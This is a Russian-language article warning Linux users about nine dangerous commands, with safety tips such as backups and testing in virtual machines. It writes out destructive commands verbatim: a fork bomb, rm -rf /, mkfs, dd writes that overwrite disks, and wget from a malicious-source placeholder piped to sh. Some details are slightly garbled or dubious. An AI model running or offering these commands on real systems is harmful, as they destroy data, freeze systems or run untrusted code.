9 Команд Linux, Которые Могут Повредить Вашу Систему

 Команды оболочки/терминала Linux очень мощные, и всего одна простая команда может привести к удалению папки, файлов или корневой папки и т.д. В некоторых случаях, Linux даже не спросит у вас подтверждения, а сразу выполнит команду, из-за чего вы можете потерять ценные данные и информацию, хранящуюся в этих файлах и папках.

Часто люди публикуют в интернете рекомендации новым пользователям Linux выполнить эти команды. Это может показаться шуткой для того, кто опубликовал контент, но для человека с другой стороны это не смешно.

Мы собрали некоторые команды Linux, которые могут быть весьма вредными для вашей системы, чтобы помочь вам избежать их. Имейте в виду, что они действительно опасны и могут быть изменены различными способами для создания новых команд, наносящих еще больше ущерба.

Важно отметить, что некоторые из этих команд опасны только в том случае, если они предварены sudo в Ubuntu. В то время как в других дистрибутивах Linux большинство этих команд будут опасными при выполнении от имени root.

Взгляните на 9 команд и кодов, которые следует избегать.

1. Команда Fork Bomb в Linux

:(){ :|: & };: также известна как Fork Bomb - это атака отказа в обслуживании против системы Linux. :(){ :|: & };: - это функция bash. После выполнения она повторяется множество раз, пока система не зависнет.

Вы можете избавиться от нее только перезагрузив систему. Поэтому будьте осторожны при выполнении этой команды в оболочке Linux.

2. Команда mv folder/dev/null

mv folder/dev/null - еще одна рискованная команда. Dev/null или null device - это файл устройства, который отбрасывает все данные, записанные на него, но сообщает, что операция записи выполнена успешно. Его также называют битовым ведром или черной дырой.

3. Команда rm -rf

Команда rm -rf - это быстрый способ удалить папку и ее содержимое в операционной системе Linux. Если вы не знаете, как ее правильно использовать, она может стать очень опасной для системы. Ниже перечислены наиболее распространенные комбинации и опции, используемые с командой rm -rf:

• Команда rm используется для удаления файлов в системе Linux.
• Команда rm -f удаляет файлы только для чтения в папке без запроса.
• Команда rm -r удаляет содержимое папки рекурсивно.
• Команда rm -d используется для удаления пустого каталога, но она откажется удалять каталог, если он не пуст.
• Команда rm -rf/ используется для принудительного удаления (она удаляет его, даже если он защищен от записи) всего содержимого в корневом каталоге и подпапках.
• Команда rm -rf* используется для принудительного удаления всего содержимого в текущем каталоге (каталоге, в котором вы в данный момент работаете) и подпапках.
• Команда rm -rf. используется для принудительного удаления всего содержимого в текущей папке и подпапках. Также можно использовать команду rm -r.[^.]*.
• Команда rm -i используется для удаления файлов и папок, но перед удалением появится запрос.

4. Команда mkfs

mkfs может быть опасной командой для вашей системы на базе Linux, если вы не знаете ее назначения. Все, что написано после mkfs, будет отформатировано и заменено на пустую файловую систему Linux.

Все упомянутые ниже команды отформатируют жесткий диск, и для этого требуются права администратора:

• mkfs
• mkfs.ext3
• mkfs.bfs
• mkfs.ext2
• mkfs.minix
• mkfs.msdos
• mkfs.reiserfs
• mkfs.vfat

Команда mkfs.cramfs делает то же самое, что и выше, но для ее выполнения не требуются права администратора.

5. Tar Bomb

Команда tar используется для объединения нескольких файлов в один файл (архивный файл) в формате .tar. С помощью этой команды можно создать бомбу в формате Tape Archive (Tar).

Это архивный файл, который при распаковке превращается в тысячи или миллионы файлов с именами, аналогичными существующим файлам, в текущем каталоге, а не в новом каталоге.

Вы можете избежать становления жертвой бомбы tar, регулярно создавая новый защитный каталог, когда вы получаете файл tar, а затем перемещая полученный файл tar в этот каталог перед распаковкой.

Если файл tar действительно является бомбой tar, то вы можете просто удалить вновь созданный каталог, чтобы избавиться от него. Другой способ избежать взрыва бомбы tar - это использование опции -t для вывода списка всего содержимого файла tar, чтобы дать вам представление о типе содержимого, содержащегося в файле tar.

6. Команда dd

Команда dd используется для копирования и преобразования разделов жесткого диска. Однако она может оказаться вредной, если вы укажете неправильное место назначения.

Команда может быть одной из следующих:

• dd if=/dev/hda of=/dev/hdb
• dd if=/dev/hda of=/dev/sdb
• dd if=something of=/dev/hda
• dd if=something of=/dev/sda

Следующая команда обнулит весь основной жесткий диск: dd if=/dev/zero of=/dev/had

7. Код оболочки

Кто-то может сделать вас жертвой, дав вам ссылку на скрипт оболочки и рекомендовав вам скачать и выполнить его. В скрипте может содержаться некоторый вредоносный или опасный код. Формат команды может выглядеть так: wget http://some_malicious_source -O- | sh. Wget скачает скрипт, а sh скачает выполнение скрипта.

8. Вредоносный исходный код

Кто-то дает вам исходный код и просит его скомпилировать. Код может выглядеть как обычный код, но на самом деле в большом исходном коде скрыт некоторый вредоносный код, и он может нанести вред вашей системе. Чтобы избежать становления жертвой такой атаки, принимайте и компилируйте исходный код только из надежных источников.

9. Бомба декомпрессии

Вы получили сжатый файл и вас попросили извлечь этот файл, который кажется очень маленьким по размеру, но может быть всего несколько КБ. На самом деле этот маленький сжатый файл содержит очень сильно сжатые данные.

Как только файл распаковывается, извлекается сотни ГБ данных, которые могут заполнить ваш жесткий диск и снизить производительность вашей системы. Чтобы избежать этой ситуации, всегда помните о том, чтобы принимать данные только из надежных источников.

вот несколько дополнительных советов и информации по этой теме:

1. Используйте команду man: Если вы не уверены в том, что делает конкретная команда, используйте команду man перед ее выполнением. Это покажет вам руководство по использованию этой команды. Например, man rm покажет вам, как использовать команду rm.

2. Не запускайте команды от имени root, если это не нужно: Использование sudo или вход в систему как root может быть опасным, если вы не уверены в том, что делаете. Это дает вам права на выполнение любых команд, включая те, которые могут повредить вашу систему.

3. Будьте осторожны с скриптами и исполняемыми файлами из Интернета: Никогда не запускайте скрипты или исполняемые файлы, которые вы скачали из Интернета, если вы не доверяете источнику. Они могут содержать вредоносный код.

4. Используйте систему контроля версий: Если вы работаете с важными файлами, рассмотрите возможность использования системы контроля версий, такой как Git. Это позволит вам восстановить файлы, если они были случайно удалены.

5. Регулярно делайте резервные копии: Это может спасти вас в случае, если что-то пойдет не так. Вы можете использовать инструменты, такие как rsync или tar, чтобы создавать резервные копии ваших файлов.

6. Обучение и практика: Лучший способ избежать ошибок - это обучение и практика. Используйте виртуальные машины или контейнеры для экспериментов с новыми командами и скриптами. Это позволит вам изучить их поведение в безопасной среде.